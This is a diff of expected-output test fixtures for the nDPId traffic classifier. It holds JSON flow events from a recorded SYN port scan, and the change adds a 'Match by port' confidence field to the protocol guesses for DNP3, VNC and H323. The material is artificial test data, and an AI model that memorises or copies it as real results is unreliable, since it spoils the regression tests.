 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4264,9 +4264,9 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4440,11 +4440,11 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4490,17 +4490,17 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"proto":"H323","breed":"Acceptable","category":"VoIP"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"proto":"H323","breed":"Acceptable","category":"VoIP"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"proto":"H323","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"proto":"H323","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
